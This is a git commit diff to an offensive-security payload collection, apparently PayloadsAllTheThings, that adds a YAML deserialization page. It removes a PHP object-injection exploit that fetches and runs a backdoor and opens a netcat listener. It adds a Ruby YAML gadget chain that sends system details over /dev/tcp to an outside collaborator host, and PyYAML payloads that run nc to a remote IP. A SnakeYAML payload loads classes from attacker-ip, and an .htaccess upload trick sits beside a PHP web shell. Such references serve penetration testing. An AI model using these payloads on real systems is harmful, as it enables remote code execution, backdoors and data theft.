YAML Deserialization

This commit is contained in:
Swissky 2022-09-16 16:37:40 +02:00
parent e677f07197
commit 267713c0fb
9 changed files with 162 additions and 69 deletions

3
.gitignore vendored
View File

@ -1,4 +1,3 @@
BuildPDF/ BuildPDF/
.vscode .vscode
.todo .todo
AWS Amazon Lambda/

View File

@ -1,32 +0,0 @@
<?php
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/
print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
?>

View File

@ -0,0 +1,19 @@
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
method_id: :resolve

View File

@ -11,7 +11,7 @@
## Exploit ## Exploit
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
```java ```java
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
``` ```
payload | author | dependencies | impact (if not RCE) ```ps1
------|--------|------ |------ Payload Authors Dependencies
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 ------- ------- ------------
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
Clojure |@JackOfMostTrades |clojure:1.8.0 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
CommonsCollections1 |@frohoff |commons-collections:3.1 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
CommonsCollections2 |@frohoff |commons-collections4:4.0 Clojure @JackOfMostTrades clojure:1.8.0
CommonsCollections3 |@frohoff |commons-collections:3.1 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections4 |@frohoff |commons-collections4:4.0 CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 CommonsCollections3 @frohoff commons-collections:3.1
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading CommonsCollections4 @frohoff commons-collections4:4.0
Groovy1 |@frohoff |groovy:2.3.9 CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
Hibernate1 |@mbechler| CommonsCollections6 @matthias_kaiser commons-collections:3.1
Hibernate2 |@mbechler| CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
JRMPClient |@mbechler| Groovy1 @frohoff groovy:2.3.9
JRMPListener |@mbechler| Hibernate1 @mbechler
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 Hibernate2 @mbechler
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 |@frohoff| JRMPClient @mbechler
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 JRMPListener @mbechler
MozillaRhino1 |@matthias_kaiser |js:1.7R2 JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
Myfaces1 |@mbechler| JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Myfaces2 |@mbechler| Jdk7u21 @frohoff
ROME |@mbechler |rome:1.0 Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE MozillaRhino1 @matthias_kaiser js:1.7R2
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 MozillaRhino2 @_tint0 js:1.7R2
URLDNS |@gebl| | jre only vuln detect Myfaces1 @mbechler
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
## Burp extensions using ysoserial ## Burp extensions using ysoserial
@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
```java ```java
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] $ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
where where
-a - generates/tests all payloads for that marshaller -a - generates/tests all payloads for that marshaller
@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:<br />
## References ## References
- [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Github - ysoserial](https://github.com/frohoff/ysoserial)
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
- [On Jackson CVEs: Dont Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) - [On Jackson CVEs: Dont Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) - [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)

View File

@ -8,6 +8,7 @@ Check the following sub-sections, located in other files :
* [PHP (Object injection) : phpggc, ...](PHP.md) * [PHP (Object injection) : phpggc, ...](PHP.md)
* [Ruby : universal rce gadget, ...](Ruby.md) * [Ruby : universal rce gadget, ...](Ruby.md)
* [Python : pickle, ...](Python.md) * [Python : pickle, ...](Python.md)
* [YAML : PyYAML, ...](YAML.md)
## References ## References

View File

@ -59,4 +59,5 @@ Universal gadget for ruby 2.x - 3.x.
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) - [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)

View File

@ -0,0 +1,89 @@
# YAML Deserialization
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [PyYAML](#pyyaml)
* [ruamel.yaml](#ruamelyaml)
* [Ruby](#ruby)
* [SnakeYAML](#snakeyaml)
* [References](#references)
## Tools
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
## Exploit
### PyYAML
```yaml
!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
```
```yaml
!!python/object/apply:subprocess.Popen
- ls
```
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
```
## Ruamel.yaml
## Ruby
```ruby
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: sleep 600
method_id: :resolve
```
## SnakeYAML
```yaml
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
```
## References
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)

View File

@ -0,0 +1 @@
AddType application/x-httpd-php .rce

View File

@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
``` ```
# .htaccess simple php
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
Then upload any file with `.rce` extension.
# .htaccess upload as image # .htaccess upload as image
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.